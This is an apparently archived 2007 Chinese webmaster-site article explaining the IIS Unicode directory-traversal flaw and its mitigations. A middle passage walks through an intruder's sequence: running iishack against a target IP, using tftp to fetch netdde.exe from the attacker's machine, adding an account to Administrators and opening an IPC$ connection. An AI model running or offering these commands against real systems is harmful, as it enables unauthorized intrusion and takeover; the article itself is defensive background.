站长中国
设为首页 | 帮助中心

站长论坛 站长下载
您所在的位置: 站长中国 > 站长学院 > 安全技术 > 其他相关 >  正文

不要小看IIS的恶性杀手Unicode
  2007年06月03日12:37:02  评论(0条) 字体:[ ]
相关热点: 杀手 恶性 不要 攻击 漏洞 一个 c: 可以 IIS winnt system32

IIS是“Internet Information Server”的缩写,微软公司的Web服务器,是Windows 2000以上级别操作系统自带的一个组件,通过它来实现Web服务器的功能。

  Unicode漏洞是一个专门攻击IIS的漏洞,Unicode漏洞是最容易让入侵者得手的一个漏洞,可以不费吹灰之力改掉默认主页,重则删除硬盘上的数据,高手甚至可以轻松获取Administrator权限!

  由于Windows NT/2000操作系统的普及率比较高,所以很容易使它成为很多黑客攻击的目标。目前,Windows NT/2000最主要的Unicode漏洞一共有四种,分别针对不同语言的操作系统。分别为:%c1%1c、%c0%cf、%c1%pc、%c0%9v。例如第一个 %c1%1c 的问题。c1 1c,中文简体里面没有这个字,按照正常的情况,根据内码转换文件\winnt\system32\c_936.nls会编码成“?”。但对简体中文版IIS中 c1 1c解码成了(c1-c0)*40+1c=5c=“\”。此编码发生在IIS检测处理路径串中的“\”之后,所以可以突破IIS路径访问到上级目录。

  被攻击迹象

  黑客一般都采用IIS HACK攻击法进行攻击,但是需要工具“Iishack”(注:Iishack.exe是攻击NT 4.0的,Iishack1.exe是攻击NT 5.0的) Netcat和TFTP还有Netdde。

  一般入侵者的攻击手法是这样的:

  首先,将TFTP装到机器里面,将自己的机器变成一个FTP服务器。然后,搜索到NT机器的IP地址来进行攻击,例如:192.168.0.10。

  “c:\iishack 192.168.0.10 80 99 ”

  如果显示攻击成功的话,黑客就可以再输入:

  “c:\telnet 192.168.0.10 99 ”

  可以进入到“c:\winnt\system32\”里面,然后入侵者会运行“c:\winnt\system32\tftp -i <自己的IP地址> get netdde.exe ”然后再运行Netdde.exe文件,建立一个账号,将它的权限提升到Administrators组:

  “c:\winnt\system32\netdde.exe net user make love /add ”

  “c:\winnt\system32\netdde.exe net localgroup administrators make /add”

  然后退出来,用“net use \\192.168.0.10\ipc$ love /user:make”建立IPC连接以进行非法入侵。

  被攻击的机器,入侵者可以利用漏洞修改主页;删除硬盘上的东西;建立代理服务器,危害非常大。

  解决方法

   限制网络用户访问和调用“CMD”命令的权限;若没必要使用“Scripts”和“Msadc”目录,删除或改名;安装Windows NT系统时不要使用默认“WINNT”路径,改为其他的文件夹,如“C:\mywindowsnt”。

  



责任编辑:

收藏本文 打印 打印本文  推荐本文 告诉好友 投稿 投稿邮箱
    评论加载中…

站长排行

新闻

学院

专栏

盈利

国内各IT企业办公环境揭秘(多图)
阿里妈妈广告卖主全攻略
站长创业源动力 主流站长站赏析
今日上网当心 “自动运行木马变种”
ValueCommerce副总:要帮中国公司开发日
中国青少年电子竞技大赛开幕 奖金超过6
我的网络,我的团队:专访李文明
Discuz!6.0猛将出击 最强论坛程序酷炫
推荐阅读:80年小子的创业道理
搜搜问问抢不了百度知道的饭碗
[揭密网络黄链]中国留学生买凶专破日本
贴吧发帖机使用教程(绝对原创)
网站炒作的常用方法
SQL Server 个人版安装(图文教程)
五大手段确保网络的安全
网站调试之修改后台用户帐号及密码--ac
是站长就可以月赚数千元!
网管用BT的方法对抗BT下载绝招大曝光
代码高手之代码替换
大脚:全程揭秘暴利的Google AdSense账
悬挂阿里妈妈会否被百度惩罚
阿里妈妈是否是中小站长的救世主?
ECSHOP模板制作参考文档
ofzz全栏目风格提供下载
dede4.0 utf-8英文模版
黑色非主流风格
MSN风格 首页+内容页+列表+最终列表
IM中国 首页+栏目+新闻+专题
艰难的走在创业的路上 第一天
简单的浅色风格
经理人必看的十个管理网站
大脚:垃圾站超级赚钱法之二—突破“站
大脚:垃圾站超级赚钱法之——前言
不用SEO取得成功的10个步骤
关于做GOOGLE的五条经验
西联汇款兑付城市查询
迅雷联盟、快车联盟收入对比
Google AdSenser 请远离流量交换计划
Google Adsense每天统计结果稍有提前!
“google搜索”广告加盟265联盟
站长学院  网页设计 建站教程 图形图象 网络编程

Linux办公一条
Linux办公一条
看上去很美!新
看上去很美!新

Linux办公一条龙之组件间的调
浅析Linux系统帐户的管理和审
Linux新手系列之二
在Linux下调整网卡的工作模式
看上去很美!新款Linux系统JDS2
用Linux系统防火墙伪装抵住黑
Linux系统下架设CS服务器的完

新闻线索

如果你有站长界人事变动、重组并购、变革技术出现,以及产品投诉等重要新闻线索,请告诉我们,我们会给予特别关注。
0631-3653338
站长中国编辑部
站长中国24小时新闻热线: 13256307008